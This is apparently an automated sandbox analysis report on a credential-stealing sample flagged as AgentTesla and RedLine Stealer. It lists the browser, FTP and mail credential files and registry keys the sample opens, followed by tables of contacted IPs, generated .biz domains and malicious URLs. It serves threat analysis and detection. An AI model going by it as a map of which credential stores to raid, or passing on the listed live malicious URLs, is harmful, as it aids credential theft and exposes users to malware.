Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Yara detected Credential Stealer
Source: Yara match File source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.1208342967.0000000000D12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: Yara match File source: 00000013.00000002.1360287595.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.1208342967.0000000000D12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: Yara match File source: 00000012.00000002.2465149374.000000000329E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.000000000329A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: 00000010.00000002.1218270689.0000000003789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.1209788633.0000000000E42000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: Yara match File source: 00000013.00000002.1360287595.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
3.254.94.185
 uaafd.biz United States
16509 AMAZON-02US false
3.94.10.34
 ytctnunms.biz United States
14618 AMAZON-AESUS false
34.246.200.160
 tbjrpv.biz United States
16509 AMAZON-02US false
172.234.222.143
 przvgke.biz United States
20940 AKAMAI-ASN1EU true
18.208.156.248
 kcyvxytog.biz United States
14618 AMAZON-AESUS false
34.211.97.45
 vrrazpdh.biz United States
16509 AMAZON-02US false
208.100.26.245
 gytujflc.biz United States
32748 STEADFASTUS false
35.164.78.200
 nqwjmb.biz United States
16509 AMAZON-02US false
172.234.222.138
 fwiwk.biz United States
20940 AKAMAI-ASN1EU false
165.160.13.20
 myups.biz United States
19574 CSCUS false
51.195.88.199
 s82.gocheapweb.com France
16276 OVHFR false
212.162.149.53
 unknown Netherlands
64236 UNREAL-SERVERSUS false
44.213.104.86
 cikivjto.biz United States
14618 AMAZON-AESUS false
72.52.178.23
 wxgzshna.biz United States
32244 LIQUIDWEBUS false
44.221.84.105
 hehckyov.biz United States
14618 AMAZON-AESUS true
85.214.228.140
 dlynankz.biz Germany
6724 STRATOSTRATOAGDE false
54.244.188.177
 pywolwnvd.biz United States
16509 AMAZON-02US true
13.251.16.150
 sxmiywsfv.biz United States
16509 AMAZON-02US false
47.129.31.212
 qncdaagct.biz Canada
34533 ESAMARA-ASRU false
184.28.90.27
 unknown United States
16625 AKAMAI-ASUS false
104.26.13.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false
82.112.184.197
 vjaxhpbji.biz Russian Federation
43267 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU true
18.141.10.107
 warkcdu.biz United States
16509 AMAZON-02US true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
uaafd.biz 3.254.94.185 true
vjaxhpbji.biz 82.112.184.197 true
pywolwnvd.biz 54.244.188.177 true
s82.gocheapweb.com 51.195.88.199 true
ytctnunms.biz 3.94.10.34 true
qncdaagct.biz 47.129.31.212 true
lrxdmhrr.biz 54.244.188.177 true
vrrazpdh.biz 34.211.97.45 true
ctdtgwag.biz 3.94.10.34 true
cikivjto.biz 44.213.104.86 true
tbjrpv.biz 34.246.200.160 true
kcyvxytog.biz 18.208.156.248 true
hehckyov.biz 44.221.84.105 true
xlfhhhm.biz 47.129.31.212 true
warkcdu.biz 18.141.10.107 true
ereplfx.biz 44.213.104.86 true
npukfztj.biz 44.221.84.105 true
sxmiywsfv.biz 13.251.16.150 true
pgfsvwx.biz 18.208.156.248 true
przvgke.biz 172.234.222.143 true
dwrqljrr.biz 54.244.188.177 true
ocsvqjg.biz 3.254.94.185 true
ecxbwt.biz 54.244.188.177 true
gytujflc.biz 208.100.26.245 true
bghjpy.biz 34.211.97.45 true
damcprvgv.biz 18.208.156.248 true
gvijgjwkh.biz 3.94.10.34 true
gnqgo.biz 18.208.156.248 true
deoci.biz 18.208.156.248 true
nwdnxrd.biz 54.244.188.177 true
iuzpxe.biz 13.251.16.150 true
nqwjmb.biz 35.164.78.200 true
wllvnzb.biz 18.141.10.107 true
kvbjaur.biz 54.244.188.177 true
cvgrf.biz 54.244.188.177 true
lpuegx.biz 82.112.184.197 true
bumxkqgxu.biz 44.221.84.105 true
yhqqc.biz 34.211.97.45 true
api.ipify.org 104.26.13.205 true
vcddkls.biz 18.141.10.107 true
vyome.biz 44.213.104.86 true
dlynankz.biz 85.214.228.140 true
gcedd.biz 13.251.16.150 true
reczwga.biz 44.221.84.105 true
xccjj.biz 44.213.104.86 true
wxgzshna.biz 72.52.178.23 true
oshhkdluh.biz 54.244.188.177 true
opowhhece.biz 18.208.156.248 true
pectx.biz 44.213.104.86 true
jwkoeoqns.biz 18.208.156.248 true
jpskm.biz 34.211.97.45 true
ftxlah.biz 47.129.31.212 true
cjvgcl.biz 18.208.156.248 true
ifsaia.biz 13.251.16.150 true
rynmcq.biz 54.244.188.177 true
fjumtfnz.biz 34.211.97.45 true
oflybfv.biz 47.129.31.212 true
jhvzpcfg.biz 44.221.84.105 true
ywffr.biz 54.244.188.177 true
tnevuluw.biz 35.164.78.200 true
znwbniskf.biz 47.129.31.212 true
saytjshyf.biz 44.221.84.105 true
neazudmrq.biz 44.221.84.105 true
fwiwk.biz 172.234.222.138 true
rrqafepng.biz 47.129.31.212 true
typgfhb.biz 13.251.16.150 true
aatcwo.biz 47.129.31.212 true
esuzf.biz 34.211.97.45 true
eufxebus.biz 18.141.10.107 true
whjovd.biz 18.141.10.107 true
uphca.biz 44.221.84.105 true
htwqzczce.biz 172.234.222.143 true
xyrgy.biz 18.208.156.248 true
banwyw.biz 44.221.84.105 true
myups.biz 165.160.13.20 true
pwlqfu.biz 34.246.200.160 true
zyiexezl.biz 18.208.156.248 true
shpwbsrw.biz 13.251.16.150 true
yauexmxk.biz 18.208.156.248 true
hlzfuyy.biz 34.211.97.45 true
ssbzmoy.biz 18.141.10.107 true
knjghuig.biz 18.141.10.107 true
yunalwv.biz 208.100.26.245 true
brsua.biz 3.254.94.185 true
rffxu.biz 34.246.200.160 true
jlqltsjvh.biz 18.141.10.107 true
mgmsclkyu.biz 34.246.200.160 true
gjogvvpsf.biz 208.100.26.245 true
qaynky.biz 13.251.16.150 true
ptrim.biz 18.141.10.107 true
qpnczch.biz 44.213.104.86 true
mnjmhp.biz 47.129.31.212 true
acwjcqqv.biz 18.141.10.107 true
jdhhbs.biz 13.251.16.150 true
zrlssa.biz 44.221.84.105 true
uhxqin.biz unknown unknown
anpmnmxo.biz unknown unknown
zjbpaao.biz unknown unknown
zlenh.biz unknown unknown
muapr.biz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://dlynankz.biz/oyataqebqvq true
  • Avira URL Cloud: malware
 unknown
http://qaynky.biz/soubumgu true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://qncdaagct.biz/bsjqpgxufr false
  • Avira URL Cloud: safe
 unknown
http://mnjmhp.biz/mtnqoxhnqxwi true
  • Avira URL Cloud: malware
 unknown
http://pwlqfu.biz/wfktgrobq true
  • Avira URL Cloud: malware
 unknown
http://typgfhb.biz/rqdnnkaqeymsqe true
  • Avira URL Cloud: malware
 unknown
http://ecxbwt.biz/mbcjcfmxxflkpmuo true
  • Avira URL Cloud: malware
 unknown
http://zrlssa.biz/jmsidvkpax true
  • Avira URL Cloud: malware
 unknown
http://cikivjto.biz/fnji true
  • Avira URL Cloud: malware
 unknown
http://htwqzczce.biz/u true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://gytujflc.biz/vm false
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://fwiwk.biz/ful true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://gnqgo.biz/orioms true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://pectx.biz/vdswmyn true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://gcedd.biz/mtvhnvlftyscrey true
  • Avira URL Cloud: phishing
 unknown
http://jlqltsjvh.biz/umjblkbuugg true
  • Avira URL Cloud: malware
 unknown
http://gytujflc.biz/jtccktxedeenfqg true
  • 10%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://tbjrpv.biz/iou true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://ftxlah.biz/jxjcyhijmgghr true
  • Avira URL Cloud: malware
 unknown
http://rynmcq.biz/lrpwhcqxkh true
  • Avira URL Cloud: malware
 unknown
http://brsua.biz/d true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://warkcdu.biz/qgyptpaacdeujk true
  • Avira URL Cloud: malware
 unknown
http://xyrgy.biz/huutba true
  • Avira URL Cloud: malware
 unknown
http://cvgrf.biz/rioeg true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://npukfztj.biz/hshnlfiqt true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://yauexmxk.biz/afqnwtrkmt true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://jdhhbs.biz/bduojpmqwclgr true
  • Avira URL Cloud: malware
 unknown
http://jhvzpcfg.biz/dx true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://aatcwo.biz/pcsirhcwmnroqpc false
  • Avira URL Cloud: safe
 unknown
http://pywolwnvd.biz/dafjrbte true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://ecxbwt.biz/ocoeycxqebnmcofx true
  • Avira URL Cloud: malware
 unknown
http://jwkoeoqns.biz/saunpuqsumkr true
  • Avira URL Cloud: malware
 unknown
http://knjghuig.biz/qvtcyxjgqcewj true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://ifsaia.biz/cygphrvvuwwhpqjy true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://ywffr.biz/nkpyoqcnfxfvdsvg true
  • Avira URL Cloud: malware
 unknown
http://przvgke.biz/ocfuav true
  • 10%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://qpnczch.biz/rlifsams true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://reczwga.biz/w true
  • Avira URL Cloud: malware
 unknown
http://fjumtfnz.biz/rvqem true
  • Avira URL Cloud: malware
 unknown
http://oflybfv.biz/umdr true
  • Avira URL Cloud: malware
 unknown
http://shpwbsrw.biz/lrnrnpb false
  • Avira URL Cloud: safe
 unknown
http://ctdtgwag.biz/qmsckions true
  • Avira URL Cloud: malware
 unknown
http://npukfztj.biz/avqaqcipoasdlbgl true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://tnevuluw.biz/jpral true
  • Avira URL Cloud: malware
 unknown
http://ocsvqjg.biz/cceha true
  • Avira URL Cloud: malware
 unknown
http://eufxebus.biz/li true
  • Avira URL Cloud: malware
 unknown
http://sxmiywsfv.biz/vahgcdxtf true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://vjaxhpbji.biz/kwejxnusmbg false
  • Avira URL Cloud: safe
 unknown
http://vjaxhpbji.biz/lsedv false
  • Avira URL Cloud: safe
 unknown
http://vyome.biz/bpkaqfdvy true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://ptrim.biz/imppcncbrvlqyyq false
  • Avira URL Cloud: safe
 unknown
http://rffxu.biz/ociacchi true
  • Avira URL Cloud: malware
 unknown
http://myups.biz/sem true
  • 15%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://vrrazpdh.biz/jjv true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://nqwjmb.biz/aawflokdkaaso true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://opowhhece.biz/ksosgyughs true
  • Avira URL Cloud: malware
 unknown
http://wxgzshna.biz/qjjv true
  • Avira URL Cloud: phishing
 unknown
http://oshhkdluh.biz/b true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://pgfsvwx.biz/suw false
  • Avira URL Cloud: safe
 unknown
http://kvbjaur.biz/w true
  • Avira URL Cloud: malware
 unknown
http://yunalwv.biz/ieibbbqqgmrvhkh true
  • 10%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://uaafd.biz/cdficgkndhspr true
  • Avira URL Cloud: malware
 unknown
http://damcprvgv.biz/ckgw true
  • Avira URL Cloud: malware
 unknown
http://myups.biz/vsftv true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://kcyvxytog.biz/qakf false
  • Avira URL Cloud: safe
 unknown
http://rffxu.biz/nifaqe true
  • Avira URL Cloud: malware
 unknown
http://dwrqljrr.biz/pgm true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://przvgke.biz/hea true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://mgmsclkyu.biz/b true
  • Avira URL Cloud: malware
 unknown
http://whjovd.biz/vu true
  • Avira URL Cloud: malware
 unknown
http://ytctnunms.biz/hysug true
  • Avira URL Cloud: malware
 unknown
http://fwiwk.biz/l true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://bghjpy.biz/tqtlouxtvhvc true
  • Avira URL Cloud: malware
 unknown
http://iuzpxe.biz/kybt true
  • Avira URL Cloud: malware
 unknown
http://shpwbsrw.biz/kuxiqsojkmip false
  • Avira URL Cloud: safe
 unknown
http://wxgzshna.biz/tp true
  • Avira URL Cloud: phishing
 unknown
http://lpuegx.biz/qjnvredjkanikntw true
  • Avira URL Cloud: phishing
 unknown
http://deoci.biz/kyvgodg true
  • Avira URL Cloud: malware
 unknown
http://jpskm.biz/gjwgeffxixqbuh true
  • Avira URL Cloud: malware
 unknown
http://ssbzmoy.biz/gadlqtcclo true
  • 16%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://banwyw.biz/cfhujvjhaho true
  • Avira URL Cloud: malware
 unknown
http://gjogvvpsf.biz/eyi true
  • Avira URL Cloud: malware
 unknown
http://ereplfx.biz/pjgdeytc false
  • Avira URL Cloud: safe
 unknown
http://rrqafepng.biz/chtmfsmomhgtgs true
  • Avira URL Cloud: malware
 unknown
http://xlfhhhm.biz/hdnypmld true
  • Avira URL Cloud: malware
 unknown
http://vcddkls.biz/iac true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://nwdnxrd.biz/gtcuyk false
  • Avira URL Cloud: safe
 unknown
http://htwqzczce.biz/njmokryu true
  • Avira URL Cloud: malware
 unknown
http://neazudmrq.biz/llhapbqwborcds false
  • Avira URL Cloud: safe
 unknown
http://wllvnzb.biz/xurinfdw true
  • Avira URL Cloud: malware
 unknown
http://acwjcqqv.biz/sucofgimje true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://gvijgjwkh.biz/lqycgpuam true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://ssbzmoy.biz/qlyvjmdwxl true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://hlzfuyy.biz/rngnlo true
  • Avira URL Cloud: malware
 unknown
http://saytjshyf.biz/pjojuiupwn true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://esuzf.biz/adwycgrxdylfxl true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://yhqqc.biz/uilsnghvu true
  • Avira URL Cloud: malware
 unknown
http://uphca.biz/ucx true
  • Avira URL Cloud: malware
 unknown
http://pywolwnvd.biz/ibmog true
  • 14%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://bumxkqgxu.biz/e true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown